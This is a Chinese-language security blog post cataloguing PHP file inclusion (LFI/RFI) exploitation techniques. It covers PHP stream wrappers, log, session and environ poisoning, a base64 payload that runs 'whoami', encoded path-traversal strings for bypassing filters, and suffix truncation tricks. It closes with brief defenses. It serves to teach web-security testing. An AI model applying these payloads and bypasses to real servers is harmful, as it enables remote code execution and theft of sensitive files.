https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/

基本

相關函式

php中引發檔案包含漏洞的通常是以下四個函式：

1. include()
2. include_once()
3. require()
4. require_once()

reuqire() 如果在包含的過程中有錯，比如檔案不存在等，則會直接退出，不執行後續語句。

include() 如果出錯的話，只會提出警告，會繼續執行後續語句。

require_once() 和 include_once() 功能與require() 和 include() 類似。但如果一個檔案已經被包含過了，則 require_once() 和 include_once() 則不會再包含它，以避免函式重定義或變數重賦值等問題。

當利用這四個函式來包含檔案時，不管檔案是什麼型別（圖片、txt等等），都會直接作為php檔案進行解析。測試程式碼：

在同目錄下有個phpinfo.txt，其內容為<? phpinfo(); ?>。則只需要訪問：

即可成功解析phpinfo。

場景

1. 具有相關的檔案包含函式。
2. 檔案包含函式中存在動態變數，比如 include $file;。
3. 攻擊者能夠控制該變數，比如$file = $_GET['file'];。

分類

LFI(Local File Inclusion)

本地檔案包含漏洞，顧名思義，指的是能開啟幷包含本地檔案的漏洞。大部分情況下遇到的檔案包含漏洞都是LFI。簡單的測試用例如前所示。

RFI(Remote File Inclusion)

遠端檔案包含漏洞。是指能夠包含遠端伺服器上的檔案並執行。由於遠端伺服器的檔案是我們可控的，因此漏洞一旦存在危害性會很大。
但RFI的利用條件較為苛刻，需要php.ini中進行配置

1. allow_url_fopen = On
2. allow_url_include = On

兩個配置選項均需要為On，才能遠端包含檔案成功。

在php.ini中，allow_url_fopen預設一直是On，而allow_url_include從php5.2之後就預設為Off。

包含姿勢

下面例子中測試程式碼均為：

allow_url_fopen 預設為 On
allow_url_include 預設為 Off

若有特殊要求，會在利用條件裡指出。

php偽協議

php://input

利用條件：

1. allow_url_include = On。
2. 對allow_url_fopen不做要求。

姿勢：

php://filter

利用條件：無甚

姿勢：

通過指定末尾的檔案，可以讀取經base64加密後的檔案原始碼，之後再base64解碼一下就行。雖然不能直接獲取到shell等，但能讀取敏感檔案危害也是挺大的。

其他姿勢：

效果跟前面一樣，少了read等關鍵字。在繞過一些waf時也許有用。

phar://

利用條件：

1. php版本大於等於php5.3.0

姿勢：

假設有個檔案phpinfo.txt，其內容為<?php phpinfo(); ?>，打包成zip壓縮包，如下：

指定絕對路徑

或者使用相對路徑（這裡test.zip就在當前目錄下）

zip://

利用條件：

1. php版本大於等於php5.3.0

姿勢：
構造zip包的方法同phar。

但使用zip協議，需要指定絕對路徑，同時將#編碼為%23，之後填上壓縮包內的檔案。

若是使用相對路徑，則會包含失敗。

data:URI schema

利用條件：

1. php版本大於等於php5.2
2. allow_url_fopen = On
3. allow_url_include = On

姿勢一：

執行命令：

姿勢二：

加號+的url編碼為%2b，PD9waHAgcGhwaW5mbygpOz8+的base64解碼為：<?php phpinfo();?>

執行命令：

其中PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==的base64解碼為：<?php system('whoami');?>

包含session

利用條件：session檔案路徑已知，且其中內容部分可控。

姿勢：

php的session檔案的儲存路徑可以在phpinfo的session.save_path看到。

常見的php-session存放位置：

1. /var/lib/php/sess_PHPSESSID
2. /var/lib/php/sess_PHPSESSID
3. /tmp/sess_PHPSESSID
4. /tmp/sessions/sess_PHPSESSID

session的檔名格式為sess_[phpsessid]。而phpsessid在傳送的請求的cookie欄位中可以看到。

要包含並利用的話，需要能控制部分sesssion檔案的內容。暫時沒有通用的辦法。有些時候，可以先包含進session檔案，觀察裡面的內容，然後根據裡面的欄位來發現可控的變數，從而利用變數來寫入payload，並之後再次包含從而執行php程式碼。

比如這篇文章：透過 LFI 引入 PHP session 檔案觸發 RCE

包含日誌

訪問日誌

利用條件： 需要知道伺服器日誌的儲存路徑，且日誌檔案可讀。

姿勢：

很多時候，web伺服器會將請求寫入到日誌檔案中，比如說apache。在使用者發起請求時，會將請求寫入access.log，當發生錯誤時將錯誤寫入error.log。預設情況下，日誌儲存路徑在 /var/log/apache2/。

但如果是直接發起請求，會導致一些符號被編碼使得包含無法正確解析。可以使用burp截包後修改。

正常的php程式碼已經寫入了 /var/log/apache2/access.log。然後進行包含即可。

在一些場景中，log的地址是被修改掉的。你可以通過讀取相應的配置檔案後，再進行包含。

這裡提供一道包含日誌的CTF題目：SHACTF-2017- Bon Appétit (100)-writeup

SSH log

利用條件：需要知道ssh-log的位置，且可讀。預設情況下為 /var/log/auth.log

姿勢：

用ssh連線：

之後會提示輸入密碼等等，隨便輸入。

然後在remotehost的ssh-log中即可寫入php程式碼：

之後進行檔案包含即可。

參考：RCE with LFI and SSH Log Poisoning

包含environ

利用條件：

1. php以cgi方式執行，這樣environ才會保持UA頭。
2. environ檔案儲存位置已知，且environ檔案可讀。

姿勢：

proc/self/environ中會儲存user-agent頭。如果在user-agent中插入php程式碼，則php程式碼會被寫入到environ中。之後再包含它，即可。

可以參考這個：

1. The proc/self/environ Injection
2. shell via LFI - proc/self/environ method

包含fd

跟包含environ類似。

參考： LFI Cheat Sheet：/proc/self/environ LFI Method

包含臨時檔案

php中上傳檔案，會建立臨時檔案。在linux下使用/tmp目錄，而在windows下使用c:\winsdows\temp目錄。在臨時檔案被刪除之前，利用競爭即可包含該臨時檔案。

由於包含需要知道包含的檔名。一種方法是進行暴力猜解，linux下使用的隨機函式有缺陷，而window下只有65535中不同的檔名，所以這個方法是可行的。

另一種方法是配合phpinfo頁面的php variables，可以直接獲取到上傳檔案的儲存路徑和臨時檔名，直接包含即可。這個方法可以參考LFI With PHPInfo Assistance

類似利用臨時檔案的存在，競爭時間去包含的，可以看看這道CTF題：XMAN夏令營-2017-babyweb-writeup

包含上傳檔案

利用條件：千變萬化，不過至少得知道上傳的檔案在哪，叫啥名字。。。

姿勢：

往往要配合上傳的姿勢，不說了，太多了。

其餘

一個web服務往往會用到多個其他服務，比如ftp服務，資料庫等等。這些應用也會產生相應的檔案，但這就需要具體情況具體分析咯。這裡就不展開了。

繞過姿勢

接下來聊聊繞過姿勢。平常碰到的情況肯定不會是簡簡單單的include $_GET['file'];這樣直接把變數傳入包含函式的。在很多時候包含的變數/檔案不是完全可控的，比如下面這段程式碼指定了字首和字尾：

這樣就很“難”直接去包含前面提到的種種檔案。

指定字首

先考慮一下指定了字首的情況吧。測試程式碼:

目錄遍歷

這個最簡單了，簡要的提一下。

現在在/var/log/test.txt檔案中有php程式碼<?php phpinfo();?>，則利用../可以進行目錄遍歷，比如我們嘗試訪問：

則伺服器端實際拼接出來的路徑為：/var/www/html/../../log/test.txt，也即/var/log/test.txt。從而包含成功。

編碼繞過

伺服器端常常會對於../等做一些過濾，可以用一些編碼來進行繞過。下面這些總結來自《白帽子講Web安全》。

• 利用url編碼
  • ../
    • %2e%2e%2f
    • ..%2f
    • %2e%2e/
  • ..\
    • %2e%2e%5c
    • ..%5c
    • %2e%2e\
• 二次編碼
  • ../
    • %252e%252e%252f
  • ..\
    • %252e%252e%255c
• 容器/伺服器的編碼方式
  • ../
    • ..%c0%af
      • 注：Why does Directory traversal attack %C0%AF work?
    • %c0%ae%c0%ae/
      • 注：java中會把”%c0%ae”解析為”\uC0AE”，最後轉義為ASCCII字元的”.”（點）
      • Apache Tomcat Directory Traversal
  • ..\
    • ..%c1%9c

指定字尾

接著考慮指定字尾的情況。測試程式碼:

URL

url格式

在遠端檔案包含漏洞（RFI）中，可以利用query或fragment來繞過後綴限制。

姿勢一：query（？）

則包含的檔案為 http://remoteaddr/remoteinfo.txt?/test/test.php
問號後面的部分/test/test.php，也就是指定的字尾被當作query從而被繞過。

姿勢二：fragment（#）

則包含的檔案為 http://remoteaddr/remoteinfo.txt#/test/test.php
問號後面的部分/test/test.php，也就是指定的字尾被當作fragment從而被繞過。注意需要把#進行url編碼為%23。

利用協議

前面有提到過利用zip協議和phar協議。假設現在測試程式碼為：

構造壓縮包如下：

其中test.php內容為：

利用zip協議，注意要指定絕對路徑

則拼接後為：zip://D:\phpStudy\WWW\fileinclude\chybeta.zip#chybeta/test/test.php

能成功包含。

在利用phar協議的時候有些問題。哪位能指教一下？

長度截斷

利用條件： php版本 < php 5.2.8

目錄字串，在linux下4096位元組時會達到最大值，在window下是256位元組。只要不斷的重複./

則字尾/test/test.php，在達到最大值後會被直接丟棄掉。

0位元組截斷

利用條件： php版本 < php 5.3.4

能利用00截斷的場景現在應該很少了：）

防禦方案

1. 在很多場景中都需要去包含web目錄之外的檔案，如果php配置了open_basedir，則會包含失敗
2. 做好檔案的許可權管理
3. 對危險字元進行過濾等等